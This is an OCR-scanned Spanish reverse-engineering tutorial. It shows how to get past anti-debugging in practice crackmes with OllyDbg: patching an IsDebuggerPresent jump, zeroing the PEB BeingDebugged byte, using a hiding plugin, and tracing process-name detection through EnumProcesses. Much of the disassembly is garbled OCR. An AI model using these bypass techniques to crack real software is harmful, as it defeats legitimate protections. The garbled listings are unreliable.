a . |FF75 6 PUSH DWORD PTR SS: [EBP+C] Message 
a . |FF?5 08 PUSH DWORD PTR SS: [EBP+8] hlind 
a . [ES EBO00000 | CALL <JMP.2user32. DefllindowProcA> DefllindowProcA 
a 5 e LEAVE 
a . 102 1008 
> +33C0 FOR EAX, EAX 
61 ES LEAVE 
1 . C2 1008 
61 $ 55 PUSH _EBP 
al . 8BEC MOU EBP,ESP 


Y si tenemos paciencia de tracear bastante mientras va cerrando todo, observaremos que llegara 
a la api ExitProcess que es la que cierra el proceso.(si no tienen paciencia le ponen un BP ExitProcess y 
parara en ella) 


aja 148 . DH Yu run y HI3Z = DUDO 
00451 . FF35 50314001 PUSH DWORD PTR DS: [463150] [si = 10400990 
00401 . ES M604BBBa Crackmel. 00401031 
an4B1 . 59 PUSH EAX Ex ¡itCode 

00401 . ES 39040000 ¡CALL <JMP.tkernel32.ExitProcess> ExitProcess 
600451 $ 55 PUSH _EBP 

00451 . 8BEC MOU EBP,ESP 

60451 . 8304 E4 ADD ESP, -4C 

90491 + [745 Da 30001 MOU DWORD PTR SS: [EBP-30],30 


Así que ya vimos que el salto que esta al volver de la api IsDebuggerPresent es el que toma la 
decisión de si corre o se cierra, una solución podría ser parchearlo, reiniciemos el programa y lleguemos 
al salto decisivo. 


EXE 0 +) 90) 3] 4 2jelmr) wa) e) Je ]8/rJ>4 


OR ERX, ERX 


v/74 05 
«v| E9 53010099 
>ES 72010000 
63 _EDO30' PUSH 3ED ControlID = 3ED (100€ 
PUSH DWORD PTR SS: [EBP+8] (tina 
Es 53020000 GetDlgltem 


Mo SEDIAraa ¿Ma MiNDA DTD Ms FAri212071 ENnY 


j 
al 


SARA 
DO 


Dí 


1 
1 


y 
Y 
Y 


pu 
DO 


Allí esta y como habíamos visto tenia que saltar siempre, por lo cual lo cambiamos a JMP, 
tecleando la barra espaciadora y escribiendo JMP 4011b2. 


OR_EAX, ERX 


EB 05s JMP SHORT Cracknmel.004011B2 
.v|E2 53010000 JP, Erackmel 09491585 
> PES 12010000 


68 EDB30008 | PUSH SED 
FF7S 08 PUSH DWORD PTR SS: [EBP+8] h 
FAL < IMP. 2usera2.RetMlaTtem> 4 


FA SRA2ARAR 


Allí esta, vemos que ahora evita el JMP que va a cerrar el programa y el mismo continua 
funcionando. 


Guardemos los cambios en un archivo con otro nombre, hagamos click derecho 


» [ontrolID = SED (108 


68 EDO30000 | PUSH | 
FF?5 0 Push COpy huind 
Es seuconos [CALL Ñ GetDlgItem 
As 2F3149000 [mou Binary » 
ÉFas 2eS13901 PUSH. Undo selecti alteeksp — hina = mul 
++ nd = 

ES ¿2020000 dd P—— [BettlindouTextA 
501 1810080, ma Assemble Space 
epds 10 mou É Label : 
es FrEFODOS [AND E y 
3D 11270008 |CMP Comment $ 
74 07 : 
3D Ecosaaaa Breakpoint » 
Ed 

i » 
E s0 Hit trace 
FF75_08 Run trace » hina 
ES ¿rosonaa [SendiMlessagefi 
30 75270008 Follow Enter 
75 19 
7] Go to » lb MB_OK!MB_APP 
ds 5308 Eolo > is 

. tt 

FF75 08 ID hOwner Ls 
dal. NN og 
AA a alli Ñ 
és Esosones [push] Findreferences to P IcontroLID = 3EE (109 
FF7S 88 PUSH | a hlind 
ES D2010000 View » [GetDigltem 


AS 33314000 


68 F1030000 Copy to 
FF7S 08 ” 
ES Pantan0R | Paro hmalunia * All iii 


Y en la nueva ventana que se abre hagamos nuevamente click derecho 


Documents and SettingsiRicardo 


= TIT 

53010000 —|JMP 00000705 

72010000 CALL OMMAB729 

20030000 — |PUSH 3ED 

5 08 PUSH DWORD _PTR SS: CEBP+8] 

JFS1aa00 — | MOV DUORO PY 

3ca14008_ |PusH 4es1isc| Backup 

5 2F314000 | PUSH DWORD F 

79020006 — [CALL ammmBsE  COpy 

45010000 —|JMP 0000723 

1io10000 — [CMP EAX.111 Binary 
ozeleoos | anbnere 


MOU EA%, DWOF 
FFFO000 , Assemble 
E Search for 


ar Ji 

30030000 MP El 3EC 

16] JNZ SHORT BE 

30 PUSH a 
——— o 15513 
Save file as 


Guardar en: | (0) crackmelfix y] “(E e 
€ Me Crackmel.exe 


Documentos 
recientes 


Escritorio 


Mis sitios de red Nombre: Crackmel pl exe y 
Tipo: Executable file [*.exe] y Cancelar | 
tomes |, 


Lo guardo con el nombre crackmelp, así tengo los dos el original y el parcheado. 


Ahora abramos el parcheado en OLLYDBG para ver si corre en el mismo, sin poner ningún BP 
ni nada 


0De DT executaDTe [A] 
Buscar en: |) crackmel fix y] e (e Ed” 

¡me Crackme1.exe 

ERuCcrackmelp.exe 


Versión del archivo: 0.0,2,4 
Fecha de creación: 21/12/2005 9:50 
Tamaño: 40,5 KB 


Nombre: Crackmelp.exe LE 
Tipo: Executable file (*.exe) Cancelar 


Arguments: 


ty123's Crac... E] 


File Help 


ID No. [DSED3807 
Serial | 


Corre perfectamente, así que ya sabemos hacer correr un programa cambiando EAX al volver de 


IsDebuggerPresent, también sabemos parchear para que corra y no tengamos que tomarnos el trabajo de 
hacerlo a mano. 


Con este crackme no tendremos problema, para parchearlo y que corra, aunque por supuesto hay 


métodos mas sencillos usando plugins que nos evitan realizar todo este trabajo, pero es bueno conocer 
como funcionan las cosas. 


Ahora la pregunta que alguien se podría hacer es la siguiente volvamos al original y miremos la 
api. 


Command ENEE EE 
Program entry point 


Pi odo Bl ca ALL TA O aia Y Y Y Y Y | 
e4:81_ 18099000] 100 EAX, DWORD PTR FS: 118] 
8840 30 U_EAX, DWORD_PTR_DS: [EAX+30] 


ta B2 HOUZR EAX, BYTE PTR DS: [EAX+2] 


mo AS 


Son tres tristes MOV y con eso la api determina si esta siendo debuggeado el programa o no. 


Lo primero que se me viene a la cabeza es, porque el programa no podría ejecutar estas tres 
líneas mezcladas entre su código, las cuales le devolverían en EAX el valor 1 si esta siendo debuggeado, 
probemos reiniciemos el crackme original y en el entry point escribamos. 

MOV EAX,DWORD PTR FS:[18] 

MOV EAX,DWORD PTR DS:[EAX+30] 

MOVZX EAX,BYTE PTR DS:[EAX+2] 


Podemos copiar y pegar cada línea de aquí. 


Assemble at 00401000 
[mov ESxX. DWORD PTA FS:[18] y| 


[40 Fill with NOP's 


Cancel 


E Ple view LVEUUYO FIugiio PULSO YY ME 
mex] eu] vis] $03) U] +] 1jejmjt[wu[c)]7[x]8[r]-/s] ¿8 
64 1300001 MOU E ORD PTR 13] 


3840 30 EAX, DWORD_PTR 
BrE649 92 


90 
Es 72040000 


mMOU DS: [EAX+30] 
ea EAX,BYTE PTR DS: [EAX+2 


] 


CInitCommonControls 
A (5]5]515]51515]=1 


PUSH BA 
FF35 54314001 PUSH DWORD PTR DS: [403154] (9]5]515]51515]5) 
5A 06 PUSH Pre (9]5]515]51515]5] 
FF35 56314001 PUSH DWORD PTR_ DS: [403156] Aral = BBBBBBDO 
ES 06000009 Crackmel. 00401031 
PUSH EAX Ex itCode 


CALL <JMP.Skerne132.Ex itProcess> 
PUSH_EBP 

MOU EBP,ESP 

ADD ESP, -4C 

MOU DWORD PTR SS: [EBP-230],30 

MOU DWORD PTR SS: [EBP-2C],3 

MOU DWORD PTR SS: [EBP-28],Crackmel. 0040 
MOU DWORD PTR SS: [EBP-24].0 


ExitProcess 


50 
Es 39040000 
55 


3BEC 

38304 B4 

0745 DA 30001 
0745 D4 0300 
0745 DS FElO 
0745 DC 0000 


LH e Le 


¿ 


MOU_EAX, DWORD _PTR DS: [EAX+30] 
qna EAX,BYTE PTR DS: [ERAX+2] 


Cini 
ráAra: 


PUSH BA 


Vemos que cuando paso la ultima instrucción, EAX se puso a 1 en la misma forma que lo hace 
en la api. 


Y obviamente nunca el programa parara en la api IsDebuggerPresent, pues nunca fue llamada, e 
igual detecto que esta siendo debuggeado. 


Por ello es muy importante determinar que es lo que lee la api o mejor dicho esas tres líneas 
famosas. 


En concreto cuando un programa arranca el sistema guarda en una dirección de memoria 
determinada un uno si detecta que el programa esta siendo debuggeado y un cero si no lo esta, ese byte es 
el que leen las tres líneas estas y por supuesto la api también. 


Como podemos localizarlo al byte?, pues vayamos nuevamente a la primera línea de estas tres y 
miremos paso a paso lo que hace. 


La primera línea es 


dd fl ca A li CA a 1) 9 9) 19) Pp 9 $ y | 


) 


| 


MOU_EAX, DWORD _PTR DS: [EAX+30] 
a EAX,BYTE PTR DS: [ERAX+2] 


Y 


Tala 
Y 


Y 


(DD € 


1515) 


SAMO DON 


DD 


PUSH BA 
PUSH DWORD PTR DS: [403154] 
PUSH B 


DD 
DÍ FAA pr po po o 
3 M0 dr ( 


TFFOCODO 
ECX BB12FFBO 
EDX 7C91EB94 ntdll.KiFastSystemCallRet 
EBX 7FFOCOGa 
ESP BB12FFC4 
EBP BB12FFFO 
ESI FFFFFFFF 
EDI 7C920738 ntdll.7C920738 


EIP 00401009 Crackmel.b04010 


O ES 0023 32bit B(FFFFFF! 

1 CS 0018 32bit B(FFF 

BD SS 0023 32bit BLFFF! 

1 DS 0023 32bit BLFF J 

A FS 0B3B 32bit PFFDFOBB(FFF) 
1] 

a 


GS 64608 NULL 


LastErr ERROR_NO_ IMPERSONATION_TC 
EFL 600090246 (NO,NB,E,BE,NS,PE,GE,LE) 


STO empty -UNORM BCEO M1050164 BOBABBE 
ST1 empty 0.0 

ST2 empty 0.0 
ST3 empty 9.0 
ST4 empty 6.0 
STS empty 0.0 


En la ventana de los registros un valor muy importante, no quiero dar nombres difíciles pero ese 
valor apunta a una estructura que guarda información muy importante sobre el programa que arranco, 
vayamos a ver en el DUMP dicha dirección (en su maquina puede estar en otra dirección solo vayan a la 
dirección que les indica olly allí) 


[Address [He:_dump___________ (ascii | 
(FFOFOBB(EB FF 12 66 00 66 13 06 1 
TFFDFOBS 
7FFOFO 
7FFDFO 


7FFDFO640|DB C7 2B ES 06 00 66 aa 
7FFDFO4S/66 66 BO 66 06 Ba Ba aa 


7FFDFOSe|66 00 60 00 00 00 00 00 ........ 
ZEFOFARAL AR ARA CARA CAR CARA ARA AA AA! ........ 


Esta estructura se llama TEB O TIB y guarda buena información que si consultamos nos puede 
ayudar muchísimo con el programa, en la TIB podemos ver por ejemplo donde comienza y donde termina 
el stack del programa. 


0012C000 000010009 riv| Ri GualRi 
BO0003000 stack of ma PEiy am Gua: Ri 


1551515J0151515] R 
00140000 00004090 Poio Fu Ru 
00240000 000B500B Privi Ru RU 


Vemos que comienza en 12d000 y termina justo antes de donde se inicia la sección siguiente en 
130000. 


Hay muchos otros valores interesantes como el primero, que veremos mas detalladamente 
cuando estudiemos las excepciones, pero como adelanto si miramos en el stack ese valor 12ffE0 en mi 
maquina. 


7C816D4F 
70920738 
FEFFFFFF 
7FFDCODO 
80544938 
DO12FFCS 


RETURN to kernel32.7C816D4F 
ntdll.7C920738 


Ames 


YCS399F3 
rcsa16D58 


SE handle 
kernel32. PCS16D58 


Crackmel.<Modu leEntryPoint> 
(9J5 151515151515] 


Vemos que esta marcado como END OF SEH CHAIN, por ahora no diremos mas de el, pero si 
que esta relacionado con las excepciones. 


Una cosa interesante de este TIB es que existe una nomenclatura para acceder al cualquier valor 
del mismo, por ejemplo este valor que marque antes seria Es: [0]. 


AG 00 49 a 

3 bo 00 S6 S8 [21] EAN . .. 
Command 18:11] y] HEX-12FF: DEC: 4863 - ASCII: Oy 

A _ —_—_  _—_—————_——— EA 


Por lo tanto: 


Fs: [0] en si es el contenido en mi maquina de 7ffdf000 
Fs: [1] en si es el contenido en mi maquina de 7ffdf001 


Fs: [18] en si es el contenido en mi maquina de 7ffdf018 


Pues ese es el valor que lee en la primera línea la api, si recordamos 


¿Aa 55 1299 


340 30 
OFB64B 62 
90 


94 


— = il ai Y Y Y Y Y $ 
050 PTR FS: L 81 mM 


Y EAX+, 30] 
Drain EAX, EvTE PTR “DS: CEAX+27 
NnP 


aaa /C31604F| RETURN 
2FFCS| 7C920738|ntdll.r 
2FFCC| FEFFFFFF 

Bl ?7FFOCOBA 


A 


EE 


?FFDFO1 
7FFDFB18 


FlEnd of 
3|SE hanc 


ernel3 


DO 


Crackme 


corran EE y] HEX: 7FFDFO00 - DEC: 2147348480 - ASCII: 0y8 


Es ese valor, o sea que el valor que guarda el TIB en FS : [18] es el valor que OLLYDBG nos 
mostraba en los registros el puntero al inicio del TIB, que lo almacena allí. 


O sea que en la primera línea, solo muevea EAX el puntero al inicio del TIB, para enterarse 
donde esta ubicado en tu maquina, y eso esta en fs: [18] por lo tanto si ejecuto la línea con f8, moverá ese 
valor a EAX. 


X 
EDx 7C91EB94 ntdll.t 
EBX 7FFOCOGO 
ESP 0B12FFC4 
EBP 0B12FFFO 
ESI FFFFFFFF 
EDI 7C9206738 ntdll.; 


EIP 004601006 Crackme 


CO ES MB23 32bit £ 
Pi CS 6B1B S2bit £ 


7FFDFO10 


DD: 


ola] 


DD 


SOS OOO 
ODO: 


2ODEMO 
pro 


00401000 64:A1 18000601 MOU EAX, DWORD PTR FS: [18] 


004010 8B49 38 MOU_EAX; DWORD _PTR DS: [EAX+30] 
90401009 0FE640 02  |MOUZX EAX,BYTE PTR DS: [EAX+2] 
004010 90 NOP 
204010 90 NOP 


A EAX le suma 30 o sea seria en mi maquina 7ffdf000 + 30 =7ffdf030 


El contenido de dicho valor es fs:[30] 


Std... 


- DEC: 2147336 


O sea mueve a EAX el contenido de 7ffdf030 o fs:[30], dicho contenido en mi maquina es 
7ffdc000 no confundir con el inicio del TIB no es el mismo valor. 


IBA 


B...5)0w 


Cód. 
14] 


oreósa 02 — [móUZR EAR,EVTE PTR”OS: EERN+2 
3h np 


Le suma 2aEAX o sea 
7FFDCO0O + 2= 7FFDCO02 
Y mueve el byte que contiene esa dirección a EAX y dicho byte es el byte buscado,y ya lo 


hallamos manualmente es en mi maquina el que esta en la dirección 7FFDCO02 (en su maquina puede 
cambiar la dirección realizar el mismo proceso para hallarlo) 


6345. 
MESE 
ide lvrz! 
B...C)0w 


E AA 
de 


Allí el sistema guardo el byte 1 que lee la api, inclusive en su misma maquina puede variar de 
posición al reiniciar, pero siempre lo pueden hallar rápidamente con este método, reiniciemos el crackme. 


A A pe pa o a A AE 3) PS SS SS 3) 9) 9 y »| 


PUSH B 
CALL <JMP. kerne 132. GetModu leHandleA> 


0u4 ES 

an4 A MOV DWORD PTR DS: [403150], EAX 

Al 5 - CALL <JMP. ¿kerne 132. GetCommandL ineA> 

budt 

6n4B1016 6 PUSH BA 

pu4B1018 FE: PUSH DWORD PTR DS: [463154] 

BO4B101E 6 PUSH A 

00401020 F PUSH DWORD PTR DS: [463156] 

0u451 ES Crackmel. 004 
6bu451 50 PUSH EAX Ex ¡itCode 
00401 ES 39040000 ExitProcess 


Esta vez no escribimos nada a ver si localizamos el byte a mano y si lo ponemos a cero a mano, 
y veremos si el programa corre, pues la api leerá dicho byte y si esta a cero, pues devolverá cero, jeje. 


1)BUSCAR EL INICIO DEL TIB en la ventana de los registros del OLLYDBG 


| EAX 
= | ECX 0012FFBO 
==] EDX A ntdll.KiFastSystemCal lRet 


EBP ODI2FFFO 
ESI FFFFFFFF 
EDI 70920738 ntdll.7C920738 


EIP 00461000 Crackmel.<Modu leEntryPoint> 


BD ES 0023 S2bit O(FFFFFFFF) 
CS 0018 S2bit O(FFFFFFFF) 
SS 0023 32bit B(FFFFFFFF) 
Ds 6623 32bi 


c 

EST 

AD 

ed ¡540 

SO FS 0038 32b% 7FFODOBA( 
TO GS B099 NULL 

DO 

08 


LastErr ERROR_NO_ IMPERSONAT ION_TOKEN 


EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) 
STO empty -UNORM BCEO 01050104 90000990 
STi empty B.0 
ST2 empty 0.0 
ST3 empty B.0 
ST4 empty B.B 
STS empty B.0 
ST6 empty B.0 
ST? empty B.0 
3218 ESSE OO ZOO 
FST 0008 Cond008080 Eró6008000 
FCW B27F Prec NEAR,53 Mask El 


7FFDDGBB 


YFFDODO 
YFFDDO 
YFFDD 
YFFDD 
YFFDD 
YFFDD 
YFFDD 
YFFDDG43 
YTEFDD 
TEFDD 


ósóna.: 


AA 


7FFDODO60/66 00 60 060 00 BO 00 00 ........ 


YFFDEG 

7FFDEGOS 

7FFDOEG10/606 00 62 60 00 00 00 00/..B..... 

7FFDEB1S ML 

Td de ivrm! 
B...5)0w 

7FFDEG4 Cógid... 

7FFDEB43 ......0 

7FFDEBSO . 006400 

CEFDEOSS| 88 88 FB 7E 00 18 FC 7F/..10.po 


Y le sumo 2 y allí esta el byte (muchos dirán para que tamaña explicación si los programas 
cuando arrancan en EBX, esta siempre el puntero a esta zona, jeje o sea EBX= fs:[30], jeje) 


BO12FFEO 
7C91EB94 ntdl 
7FFDEG0O 
' Bu12FFC4 
' Ba12FFFO 
FEFEFFFF 
?C 


' 60401000 


3106 Mm mmmmmmmmio 


Bueno pero es bueno saber el método entero, porque por ahí uno no esta al inicio del programa y 
quiere hallar el byte a mano y no sabe que valor tenia EBX en el arranque, pero bueno este es el método 
completo, ahora pongamos a cero el byte. 


19 
10 PTR_SS: [EB 
19 PTR SS: TE 
al 
1 Binary HER 
Breakpoint Fill wi 
Search for Fill with 
Go to , 
Binary c 


Hex » 
R SS:[EB 
Text » 
Short » 
Long » 
Float » 
Disassemble 


Special 


a 
R_DS:L4 


Appearance » 


¿de lvh2! 
B...6)0w 


MOU EAX, DWORD PTR FS:[18] 
MOU_EAX, DWORD_PTR DS: [EAX+30] 
MOUZX EAX, BYTE PTR DS: [EAX+2] 


Y vemos que EAX que es el valor de retorno de la api vale cero o sea que al cambiar el bytea 
mano, el programa cree que no esta siendo debuggeado tanto por el uso de la api o por la lectura del byte 
sin la api. 


File Help 


1D No. [D8ED9B07 
Serial | 


Y por supuesto corre perfectamente. 


Obviamente hay muchos plugins que hacen este trabajo, uno de ellos es el plugin HideDebbuger 
1.23f que pueden descargar desde mi http aquí 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/L-M-N-%D1-0- 
P/Plugins_Olly/HideDebugger123f.zip 


Una vez descargado copian la dll en la carpeta de plugins 


Dará OQ $ ya Búsqueda [| Carpetas  [3]y 


ección (E) C:ADocuments and Settings RicardoWEscritorioHideDebugger123f 


Tareas de archivo y carpeta 


Dtros sitios 


TÁ Fecritario 


COPIANDO jeje 


Dirección |) C:PPLUGINS 
Tareas de archivo y carpeta »| CmdBar.dIl 


Otros sitios 2 
ése Disco local (C:) A HideDebuager..dll 
(E Mis documentos 
(E) Documentos compartidos =d CmdBar. ini 
¡ Opciones de configuración 
MiPC ) 
E 1 KB 


liz cibino da var 


Allí esta debajo del otro 


Ahora reinicio el OLLYDBG 


| File Wiew Debug Options Window Help 


[ax] JU) 8 1commancsar_ > EJEM TW] 


0 E 


Abra rt 


Veo que en las opciones del plugin 


Hide Debugger [Opti... 


Protect against: 


IsDebuggerPresent 
O Findweindow/Enumwindows 
O TerminateProcess 


O meth 


O Unhandled exception tricks 
O OutputDebugString exploit 


O Detach 


Viene ya marcado para evitar que detecte por el byte de IsDebuggerPresent o sea hace el trabajo 
que nosotros hicimos a mano lo pone a cero siempre, apretamos SAVE y las otras opciones por ahora las 
dejamos deshabilitadas, a medida que las vayamos estudiando, las veremos. 


[gg Hie  Yiew  LUeDUg  PIUgIns WUPptONS VYINCOW Help 


e SIM 


ÉS SFO4O00O 
AS 56314000 
Es 5FO40000 


PUSH B 

CALL <JMP. tkerne 132. GetModu leHandleA> 
MOU DWORD PTR DS: [403150], EAXx 

CALL <JMP. ¿kernel 32. GetCommandL ineA> 


Es 72040000 


CInitCommonControls 


6A BA PUSH BA Arg4 = BBA 
FF35 54314001 PUSH DWORD PTR DS: [403154] Aira3 = BBBBBBDa 
sa 0u PUSH O Arg2 = BBBOBBan 
a FF35 50314001 PUSH DWORD PTR DS: [4031507 Aral = BBBBBAAa 
a Es B6000900 OS 
15) 41tLode 


50 
Es 39040000 
55 


DOS 


E4 

Do 30061 MOV DWORD PTR SS: CEBP-30],30 

D4 63061 MOV DWORD PTR SS: [EBP-2C],3 

5 DS FE10: MOU DWORD PTR SS: [EBP-28],Crackmel. 0049 


DO 


Sí 
. . . . . dre on o 


ExitProcess 


Arranco de nuevo el crackme y me fijo ya que EBX apunta a la zona del byte 


A |Registers (FPU) 
EEE] 
0012FFES 
7C91EB94 
7FFOSO00 
BB12FFC4 
BO12FFFO 
FFFFFFFF 
70920738 


00461000 


Pa mmm 


ntd 


l 


ntd 
Cra 


nes 


Hago EBX-FOLLOW IN DUMP 


+2 vbm; 
B...5)0w 


Y vemos que el plugin hizo todo, lo puso a cero acabando con este tipo de protección, quizás 
hubiera sido mas sencillo hacer esto solo, pero creo que comprender el porque de las cosas es muy 
importante por eso la explicación completa creo que viene bien. 


Hasta la parte 20. 
Ricardo Narvaja 
21 de diciembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 20 


El siguiente truco ANTIOLLYDBG que veremos en esta oportunidad es la detección del mismo, por el 
nombre del proceso del OLLYDBG, pero antes de todo les diré una configuración del OLLYDBG que 
aun no hemos tocado y que es muy importante en este caso. 


Si vamos a DEBUGGING OPTIONS-SECURITY 


=D IX 


Commands | Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 
Security | Debug | Events | Exceptions | Trace | SFX | Strings | Addresses 


“When loading module-related information: 
[— Ignore path and extention 
[4 [Ignore timestamp 


FT |gnore CRC of code section 


Allí lo mejor es poner las tres tildes y que cargue siempre la información, verán que con las tres tildes 
puestas cuando pongan BPX en una api y reinicien el OLLYDBG, el BPX continuara puesto, lo cual evita 
tener que repetir el proceso de ponerlos uno a uno cada vez que reiniciamos. 

Estrictamente no conozco el funcionamiento interno completo del OLLYDBG pero en la practica lo que 
sucede es eso con las tres tildes, los BPX en las apis se mantienen luego de reiniciarlo. 


xp_>; _____TI RÁ + + + + eo o ooo 
Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysi: 
Security | Debug | Events | Exceptions | Trace | SEX | Strings | Address 


Y. Ignore path and extention 


[Y Ignore timestamp 


R 


Así esta mejor para mi gusto, es menos molesto, ahora si, comenzamos con el tema de antidebugging por 
el nombre del proceso. 


Deteccion del OLLYDBG por el nombre del proceso 


Cuando corremos el OLLYDBG si miramos la lista de procesos con CTRL + ALT + SUPR 


A nd A A - me rm 


| 1448 SYSTEM DO 56 KB 
OLLYDBG.EXE 1412 Ricardo DO 344 KB 
prw,exe 1324 SYSTEM D2 11,540 KB 
| avaemc,exe 1212 SYSTEM DO 1,125 KB 


Vemos que el nombre del proceso esta allí muy claro en la lista de los mismos, que le impide a un 
programa revisar todos los procesos y si encuentra alguno que se llame OLLYDBG, cerrarlo, pues nada, 
jeje. 


Usaremos un crackme que no resolveremos por ahora porque es un nivel levemente superior al actual, así 
que lo veremos mas adelante, pero estudiaremos en el la técnica de cómo detectan los programas a 
OLLYDBG por el nombre del proceso, como evitarlo manualmente y como evitarlo definitivamente jeje. 


El crackme que adjunto es el DAXXOR el cual si dejamos un OLLYDBG corriendo vacío y corremos 
fuera de OLLY el famoso DAXXOR, veremos que el crackme corre pero cierra el OLLYDBG, lo mismo 
que si lo corremos en OLLYDBG, también lo cierra y por supuesto se acaba todo. 


Estudiemos como hace esto, abrámoslo en OLLYDBG. 


[c] File View Debug o St Window Help 


o 


DB E9 

DD OFFSET Dax*xoR.__ _CPPdebugHook 
MOV EAX, DWORD PTR DS: [46608B] 
Eb 62 SHL EAX 

AS AFARSARA |MAU MINAN PTR NS: TA4RAARFT. FAX 


Y 


bb HH 
y 


wW4rZL>oL data 1IMport 


idata Import 


10472048! . 
1472058 |. idata Import 


19472038 |. ¡data Import y 
10402930| text Export PGUNit2BFinalize 


10402920| .tent Export ceUnit2Blnitialize 
10472908 | .idata Import «Rot ivateKeyboardLayout 
1472960 |. idata Import .AdjustWindowRectEx 
1472918) .idata Import ¿BeginPaint 
1M472574| .idata Import BitBlt 

1472914 | .idata Import «Cal |NextHookEx 
1472918 | .idata Import «Cal lWindowProcA 
1M47291C |. idata Import .CharLowerA 
1472928 |. ¡data Import .CharLowerBuffA 
1472924 |. idata Import .CharNextA 

1472928 | .idata Import .CharUpperBuffA 
11472920 |. idata Import . CheckMenu Iter 
10472938| . ¡data Import .«ClientToScreen 
11472934 |. idata Import CloseClipboard 
1472238) . ¡data Import 2,CloseHandle 
1472234 | .idata Import 32. CompareStringA 
10472578| . ¡data Import ' CopyEnhMetaF i leA 
16466098| .data Export e rosbuSnoR 

1M47257C |. ¡data Import CreateBitmap 
1472588) . ¡data Import CreateBrushIndirect 
1472584 |. ¡data Import CreateCompatibleBitmap 
1472588 |. idata Import CreateCompat ibleDC 
10472598| . ¡data Import CreateDIBitmap 
11472580 |. ¡data Import CreateDIBSect ion 
1472238 | .idata Import ERNELS32. CreateEventA 
147223C|. ¡data Import KERNEL32. CreateFi leA 
11472594 |. idata Import CreateFontIndirectA 
10472598 |. ¡data Import CreateHalftonePalette 
1472938 | .idata Import .Createlcon 
1472930 |. idata Import .CreateMenu 
1M47259C |. ¡data Import CreatePalette 
1047259B| . idata Import CreatePenIndirect 
10472948) .idata Import . CreatePopupiienu 
10472594 |. idata Import CreateSol ¡dBrush 
1472240) .idata Import 2,CreateThread 
1472944 |. ¡data Import 32, CreatellindowExA 
1472948 |. ¡data Import .DefFrameProcA 
1472940 | .idata Import . DefMDICHi LdProcA 
1M472958| .idata Import DeflWindowProcA 
1472244 | . ¡data Import '¡NELS32,DeletelriticalSection 
10472548! . ¡data Import 2, De leteDC 


>ommand y| 


Bueno hay unas cuantas, pero aquí hay otra protección agregada y es que el crackme no tiene cargadas en 
el inicio las apis que usara para detectar al OLLYDBG, y las cargara a medida que corra, de paso 
explicaremos también este método de protección que en si, no te permite ver todas las apis que usara, en 
la lista de NAMES, pero por otra lado tiene como contrapartida que el que se da cuenta del truco y 
descubre las apis que va cargando el programa a medida que corre, sabrá a ciencia cierta que esas apis son 
las IMPORTANTES, pues por algo el programa las oculta para que no aparezcan en la lista. 


Esto casi siempre es evidente cuando un programa que no esta empacado como en este caso, hace uso de 
la api GetProcAddress 


o proa 


idata Import 6DI3 


004725ES GetPaletteEntries 


BB472A1C!. idata Import Us «GetParent 
BB4725EC|. idata Import GDI GetPi 
60472288 .idata | Import A NNICA 
Bu4722AC |. idata Import 
B0472A20|. idata Import 

66472824 |. idata Import 

MAA A TIA ida Ta ns 


GetProcAddress se utiliza, para que el programa cargue nuevas apis, que no están en la lista para poder 
usarlas, ya veremos un uso intensivo y mas detallado de esta api en el capitulo de desempacado, pero por 
ahora pongamos un BP en dicha api. 


um4r2H53]. data Import USE! Getwindow!lhreac 
66472604 |. idata Import sb GetllinMetaFi leBi 
Command Bp GetProcAddress| y| BPa 
[Proaram entry Doint 
Y demos RUN 


Cada vez que para vemos que esta pidiendo por medio de la api GetProcAddress, la dirección en nuestra 
maquina de una determinada api la primera que pide es en este caso, __CPPdebugHook que no pertenece 
al truco que estamos estudiando por lo cual damos RUN nuevamente. 


CALL to GetProcAddress from DaxXxXoR. 664501093 
Él [hrocate - = Y6BBODOO 
l 


ProcNameOrOrdinal = "EnumProcesses” 


DI 


Así vamos pasando con F9 hasta que encontremos apis relacionadas con el truco, aquí vemos la api 
EnumProcesses que es usada, así que lo que hacemos es llegar hasta el RET de GetProcAddress la cual 
nos devuelve en EAX la dirección de la api solicitada en nuestra maquina y allí le ponemos un BPX, 
veamos, lleguemos al RET con EXECUTE TILL RETURN. 


ntdll.7C929AEB 
7C98C0038 ntdll.7C98C8DS 
0972460 
pO12E7FO 
BO12FDES 
Ba971D024 
B04664A0 DaxxoR. 004664AD 


YCa8BACS? kernel32. 7C8BACS7 


ES 0623 32bit O(FFFFFFFF) 
CS 0B61B 32bit O(FFFFFFFF) 
SS 0623 32bit O(FFFFFFFF) 
DS 0023 32bit OLFFFFFFFF) 
FS 063B 32bit YFFDEGOB(FFF) 
GS 60068 NULL 


00000 o 


Allí en EAX devuelve la dirección en mi maquina de la api solicitada, en mi caso es 7G6BB3A9A en sus 
maquinas puede variar. 


Command Bp EnumProcesses] Í y] | expression -- Estimate expression 
A Aa 


Por otro lado veo que OLLYDBG no identifica la api que no esta en la lista de NAMES, por lo cual no se 
puede poner BP directos al nombre de la api, si no que hay que poner el BP en la dirección. 


Command Bp TEBBIAJA y] 
PA | 


Ahora si lo toma 


E 
MOU EDI,DWORD PTR SS: [EBP+C] 
MOU EBX,BFFFF 
CMP EDI,EBX 


38FB 
6Fsé s71Co000 | JBE kerne 13270800898 


hz a O from DaxxXoR.B6401CA3 
odule = 
EN el = "EnumProcessModu les” 


Y 


MAIS > 


DE 
ar 


ananananara 


Hmm enumera los módulos de un proceso, hmm repito el procedimiento anterior llego al RET y le pongo 
un BPX a la dirección que me muestra EAX., 


Para no tipear mucho si estoy en el RET directamente pongo 


Command Bp EAX ] y] | 


AAA O OOO O A EAÁKÁ 


Que me servirá para colocarle BPX a todas las apis cuando este en el RET. 


B6451CBS CALL to GetProcHAddress from DaxxXoR. 66451C0B3 


[hoc te = TEBBBBDO 
ProcHameDrO0rdinal = "GetModuleBaseNamen” 


Otra sospechosa le pongo BP de la misma forma que a las anteriores, y doy RUN y para en 
EnumProcesses 


[c] File View Debug Plugins Options Window Help 


EE m0 =— CEE 2] 1]E/m]T/w]n]c] //k/B]R]... s] 


PUSH EnumProcesses 
PUSH PSAPI. Y6BB3ECS 


MOU ESI, 5060 
MOU DWORD PTR SS: [EBP-1C0J,ESI 
PUSH 


MOU EDI,DWORD _PTR DS: [<KERNEL32.LocalA|kernel32.LocalAl loo 


1000 09 09 00 09 00 00 
100 00 00 00 00 00 OO) 
1AAMDR O 


El comentario a la derecha con el nombre de la api se lo agregue yo, haciendo doble click en esa zona nos 
permite agregar un comentario. 


